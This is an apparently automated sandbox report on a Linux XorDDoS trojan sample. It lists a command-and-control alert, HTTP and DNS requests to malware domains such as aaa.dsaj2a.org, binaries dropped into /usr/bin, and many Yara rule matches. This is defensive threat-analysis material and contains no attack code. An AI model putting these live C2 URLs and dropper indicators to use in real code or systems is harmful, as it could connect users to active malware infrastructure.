Timestamp:	2024-08-20T15:33:13.718862+0200
SID:	2021336
Severity:	1
Source Port:	35282
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

HTTP traffic detected: GET /config.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: aaa.dsaj2a.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: aaa.dsaj2a.org
Source: global traffic	DNS traffic detected: DNS query: ww.dnstells.com
Source: global traffic	DNS traffic detected: DNS query: ww.gzcfr5axf7.com
Source: global traffic	DNS traffic detected: DNS query: ww.gzcfr5axf6.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 20 Aug 2024 13:33:08 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76

Source: HaJTqGiPpD, 6229.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6231.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6232.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6233.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6263.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6266.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6269.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6272.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6274.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6280.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6283.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6285.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6288.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6291.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6298.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6300.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6303.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6306.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6310.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6328.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6331.1.00000000ffecc000.00000000ffeed000.rw-.sdmp	String found in binary or memory: http://aaa.dsaj2a.org/config.rar
Source: HaJTqGiPpD, 6229.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6231.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6232.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6233.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6263.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6266.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6269.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6272.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6274.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6280.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6283.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6285.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6288.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6291.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6298.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6300.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6303.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6306.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6310.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6328.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6331.1.00000000ffecc000.00000000ffeed000.rw-.sdmp	String found in binary or memory: http://aaa.dsaj2a.org/config.rar7.com:25
Source: HaJTqGiPpD, posifzmmhg.17.dr, sxruomujjd.17.dr, sotpizdssr.17.dr, kigdktzeum.17.dr, ibkljkndlm.17.dr, libudev.so.17.dr, wvbxepjyjx.17.dr, eqznayducj.17.dr, qrabekbstr.17.dr, mizdkrdyqj.17.dr, iulapzbfpq.17.dr, gnmftoxpza.17.dr, becqudbgme.17.dr, buxftyvhwp.17.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: HaJTqGiPpD, type: SAMPLE
Source: Yara match	File source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6370.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6509.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6534.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6550.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6229, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6231, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6233, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6266, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6269, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6274, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6283, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6285, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6303, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6306, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6310, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6331, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6333, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6338, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6345, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6351, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6353, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6367, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6370, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6375, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6381, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6387, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6389, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6398, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6401, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6409, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6421, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6423, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6426, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6429, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6443, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6445, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6454, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6461, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6463, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6469, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6474, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6477, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6486, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6499, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HaJTqGiPpD PID: 6506, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ibkljkndlm, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/qrabekbstr, type: DROPPED
Source: Yara match	File source: /usr/bin/kigdktzeum, type: DROPPED
Source: Yara match	File source: /usr/bin/eqznayducj, type: DROPPED
Source: Yara match	File source: /usr/bin/wvbxepjyjx, type: DROPPED
Source: Yara match	File source: /usr/bin/sxruomujjd, type: DROPPED
Source: Yara match	File source: /usr/bin/buxftyvhwp, type: DROPPED
Source: Yara match	File source: /usr/bin/iulapzbfpq, type: DROPPED
Source: Yara match	File source: /usr/bin/gnmftoxpza, type: DROPPED
Source: Yara match	File source: /usr/bin/posifzmmhg, type: DROPPED
Source: Yara match	File source: /usr/bin/sotpizdssr, type: DROPPED
Source: Yara match	File source: /usr/bin/becqudbgme, type: DROPPED
Source: Yara match	File source: /usr/bin/mizdkrdyqj, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
